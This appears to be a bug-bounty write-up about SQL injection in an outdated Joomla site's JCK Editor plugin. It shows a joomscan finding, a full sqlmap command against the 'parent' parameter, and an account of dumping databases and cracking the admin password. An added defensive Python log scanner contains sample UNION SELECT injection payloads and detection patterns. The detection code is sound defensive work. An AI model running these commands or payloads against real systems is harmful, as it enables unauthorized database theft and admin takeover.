
Khaled Nassar


SQL Injection on

Hi, this blog post is about an SQL injection in  that allowed me to dump the whole database.

Full PoC:

When visiting this domain I noticed something.

First: this domain was running an old version of the Joomla CMS.

Let's scan it with the joomscan tool to gather information about the Joomla installation (version, plugins, etc.).

All results:

Joomla Version: 3.1
Plugins: JCK Editor (6.4.4)

Searching for JCK Editor in  I found this exploit.
Let's exploit it :D

It worked!
You can see the database version :D

Now it's time for the sqlmap tool. In the command below, --technique=U restricts sqlmap to UNION-based injection and -p parent targets the vulnerable parent parameter:

$ sqlmap -u '' --level=5 --risk=3 --random-agent --technique=U -p parent --batch --current-db --current-user

You can see the current user and the database name :)
After dumping all databases with the --all option and cracking the admin account's password hash, let's log in to the admin panel.
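From the defender's side, the UNION-based probing that sqmap's --technique=U automates against the parent parameter leaves a recognisable trail in the web server's access log. The script below is an added example written for this post (it is not code from the original write-up, from sqlmap or from the JCK Editor project): it parses Combined Log Format lines, URL-decodes the watched parameter, undoes the usual obfuscations (double encoding, /**/ in place of spaces, mixed case) and flags UNION ... SELECT payloads and the ORDER BY column-count probing that precedes them. The endpoint path and the log lines are constructed placeholders; note that the User-Agent field is deliberately not used as a signal, because the --random-agent option seen above makes it worthless.

```python
"""Flag UNION-based SQL injection probes against named query parameters in
web-server access logs. Added example for this post; not code from the
original write-up, sqlmap, joomscan or the JCK Editor project."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined Log Format:
#   ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Signatures applied to the normalised (decoded, lower-cased, comment-stripped)
# parameter value. UNION ... SELECT is the core of sqlmap --technique=U; the
# ORDER BY probe is how the number of columns is found before a UNION works.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+"),
}

# Constructed sample log (placeholder endpoint path, documentation IP range).
# Lines 1-2 are ordinary requests; lines 3-6 imitate injection probing of the
# `parent` parameter: plain, UNION, /**/-obfuscated and double-URL-encoded.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2024:10:00:02 +0000] "GET /placeholder-editor-endpoint.php?parent=3 HTTP/1.1" 200 840 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2024:10:00:03 +0000] "GET /placeholder-editor-endpoint.php?parent=3%20ORDER%20BY%2010--%20 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2024:10:00:04 +0000] "GET /placeholder-editor-endpoint.php?parent=-3%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2Cversion()--%20 HTTP/1.1" 200 910 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2024:10:00:05 +0000] "GET /placeholder-editor-endpoint.php?parent=3%2f**%2fUNION%2f**%2fSELECT%2f**%2f1%2c2%2c3 HTTP/1.1" 200 905 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2024:10:00:06 +0000] "GET /placeholder-editor-endpoint.php?parent=3%2520union%2520select%25201 HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""


def normalize(value):
    """Undo the obfuscations that hide a payload from naive string matching.

    parse_qs has already URL-decoded the value once; a second unquote_plus
    catches double encoding, /*...*/ blocks become a space (sqlmap and others
    use /**/ as a whitespace substitute), then whitespace is collapsed and the
    text lower-cased so the signatures can be written once in lower case."""
    decoded = unquote_plus(value)
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", no_comments).strip().lower()


def classify(value):
    """Return the names of every signature that matches the parameter value."""
    text = normalize(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_log(log_text, watched_params=("parent",)):
    """Scan access-log text; return one finding per flagged parameter value."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name in watched_params:
            for raw in params.get(name, []):
                hits = classify(raw)
                if hits:
                    findings.append({
                        "line": lineno, "ip": m["ip"], "status": m["status"],
                        "param": name, "value": raw, "signatures": hits,
                    })
    return findings


def hits_per_ip(findings):
    """Aggregate findings by client IP, useful for alerting on repeated probing."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['param']}={f['value']!r} -> {f['signatures']}")
    print(hits_per_ip(scan_log(SAMPLE_LOG)))
```

Run it as is and lines 3 to 6 of the constructed log are flagged while the two benign requests are not; point `scan_log` at a real log and extend `watched_params` with whichever parameters the affected endpoint reads. Because the match runs on the decoded and comment-stripped value, the same rule covers the plain, /**/-padded and double-encoded variants of the payload.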


You can watch this video about the bug.

Thanks ;0

Top comments (1)

Swindles McCoop

Thanks for sharing, this is pretty cool